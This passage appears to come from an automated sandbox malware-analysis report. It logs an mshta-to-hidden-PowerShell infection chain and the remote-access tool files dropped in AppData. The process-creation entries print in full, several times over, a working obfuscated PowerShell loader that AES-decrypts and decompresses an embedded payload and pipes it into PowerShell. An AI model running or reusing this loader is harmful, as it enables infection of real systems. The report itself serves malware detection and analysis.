Qtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - }Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\system32\cmd.exe" /c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell -
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\system32\cmd.exe" /c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.Transform
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.Transform
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0812A8D8 push esp; ret 6_2_0812AAA5
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08120654 pushfd ; ret 6_2_08120689
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0822EB62 push FFFFFF8Bh; iretd 6_2_0822EB64
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0822ED40 pushfd ; ret 6_2_0822ED41
                                Source: memtest.exe.7.drStatic PE information: section name: PAGER32C
                                Source: PCICL32.DLL.7.drStatic PE information: section name: .hhshare
                                Source: bootuwf.dll.7.drStatic PE information: 0xF460E5FA [Thu Dec 3 14:23:54 2099 UTC]
                                Source: initial sampleStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\client32.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\msvcr100.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\pcicapi.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\bootuwf.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\memtest.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\bootvhd.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\client32.exe (copy)Jump to dropped file
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
